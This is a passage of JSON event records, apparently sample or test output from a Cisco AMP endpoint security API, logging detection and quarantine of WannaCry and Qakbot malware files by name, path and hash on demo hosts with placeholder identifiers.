Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":100000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":975000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3060,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":897000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":796,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":850000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":726000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":694000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":585000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":554000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":460000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt 